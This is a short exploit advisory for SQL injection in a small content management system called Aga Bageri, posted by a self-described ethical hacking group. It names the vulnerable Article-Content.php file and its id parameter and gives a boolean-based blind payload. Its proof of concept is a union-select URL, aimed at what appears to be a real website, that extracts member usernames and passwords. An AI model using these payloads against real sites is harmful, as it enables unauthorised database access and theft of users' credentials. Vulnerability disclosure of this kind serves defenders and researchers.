[+] Exploit Title ; Aga Bageri Cms Sql Injection Vulnerability
[+] Date : 2018-01-16
[+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS
[+] Vendor Homepage : http://aqabaqeri.ir/
[+] Dork : N/A
[+] Version : 1.0
[+] Tested On : windows 10 - kali linux 2.0
[+] Contact : https://telegram.me/WebServer
[+] Description :
[!] Aga Bageri Is a personal content management
[+] Vulnerable File :
[!] Article-Content.php
[+] Security Level :
[!] High
[+] Exploitation Technique:
[!] Remote
[+] Request Method :
[!] GET
[+]Parameter: id (GET)
[!] Type: boolean-based blind
[!] Title: AND boolean-based blind - WHERE or HAVING clause
[!] Payload: id=3 AND 5271=5271
[+] POC :
[!] http://chobara.ir/Article-Content.php?id=3
[!] http://chobara.ir/Article-Content.php?id=-3+union+select+1,2,3,4,group_concat
(ID,0x3a,Username,0x3a,Password),6,7,8,9,10,11+from+members--